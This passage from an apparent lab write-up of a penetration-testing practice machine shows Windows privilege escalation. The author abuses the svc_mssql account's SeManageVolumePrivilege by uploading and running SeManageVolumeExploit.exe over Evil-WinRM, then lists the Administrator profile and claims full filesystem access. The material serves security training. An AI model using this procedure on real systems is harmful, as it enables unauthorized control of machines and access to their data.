SeManageVolumePrivilege
It has been identified that the svc_mssql account has the SeManageVolumePrivilege privilege, which could be leveraged and abused for privilege escalation.
*Evil-WinRM* PS C:\tmp> upload SeManageVolumeExploit.exe
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/SeManageVolumeExploit.exe to C:\tmp\SeManageVolumeExploit.exe
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!Delivery complete
PS C:\tmp> .\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 1025
DONE Executing the exploit
PS C:\tmp> tree /F /A C:\Users\Administrator
tree /F /A C:\Users\Administrator
Folder PATH listing
Volume serial number is 4CB9-C891
C:\USERS\ADMINISTRATOR
+---3D Objects
+---Contacts
+---Desktop
| email.txt
| proof.txt
|
+---Documents
| +---SQL Server Management Studio
| | \---Code Snippets
| | \---SQL
| | \---My Code Snippets
| \---Visual Studio 2017
| \---Templates
| +---ItemTemplates
| | +---JavaScript
| | \---TypeScript
| \---ProjectTemplates
| +---JavaScript
| \---TypeScript
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---VideosNow I have read and write access to the entire filesystem